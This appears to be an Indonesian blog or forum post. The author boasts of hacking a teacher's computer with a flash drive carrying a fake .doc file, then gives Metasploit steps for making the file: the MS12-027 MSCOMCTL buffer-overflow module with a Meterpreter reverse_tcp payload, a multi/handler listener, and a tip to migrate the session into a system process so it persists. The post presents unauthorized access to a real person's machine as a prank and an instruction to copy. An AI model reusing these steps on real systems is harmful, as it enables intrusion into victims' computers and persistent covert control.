thank's ya udah sering update di blog ane :D
ane mau curhat,sekalian share ilmu nih
waktu itu saya ada tugas sekolah,mengunakan Ms.Office Word
semua teman saya sudah memberikan tugas mereka masing-masing lewat flash disk nya
dan saya lagi itu kebetulan tugas nya lupa di copy ke flash disk -_-
idea gila ini datang ketika saya mengetikan "route" pada laptop saya
dan saya melakukan scaning dengan Nmap.ternyata saya dan guru saya berada dalam satu jaringan yang sama
idea saya adalah membuat overlow aplikasi ms.office guru saya,agar dia tak bisa melihat tugas saya.
karna file .doc saya ini bukan ducument sebenar nya,melainkan payload :v
dan saya setting autorun pada flash disk,
sebelum mendatangi meja guru tersebut saya sudah menjalankan Reverse_tcp,dan mengengarkan ip yg masuk ke meterpreter
hanya tinggal menungu korban menjalankan file saya..
dengan bangga saya mengahpiri meja guru itu
dan menyolokan Flash saya sendiri
alhasil aplikasi guru saya itu langsung "Not Responding"
saya beralasan,kalau file tersebut terkena virus
dan minta izin untuk ngumpulin lagi besok
begitu saya kembali ke meja saya,meterpreter terbuka
rencana sih mau di jailin tuh guru
sekian cerita dari saya Clound
tapi bagaimana cara membuat Payload berextension .doc
hampir lupa saya :3
ketik di msfconsole kalian :
> use exploit/windows/fileformat/ms12_027_mscomctl_bof
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit
tahap ini kita hanya baru membuat file payload nya aja
file payload nya berada di folder : /root/.msf4/local/
jika sudah siap semua,langsung jalankan exploit multi_handler
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit
nah,tinggal tungguin aja korban menjalankan payload tersebut
tambahan sedikit,begitu ms.office "not responding"
biasa nya dia langsung exit dengan sendiri nya,arti nya payload kita juga akan exit
segera lakukan migrate ke aplikasi lain,dengan membaca proses yg di lakukan si target :D
karna kalau udah migrate,meterpreter kita tak bisa di hentikan,apa lagi klo migrate nya ke prosses system
ok,thank's
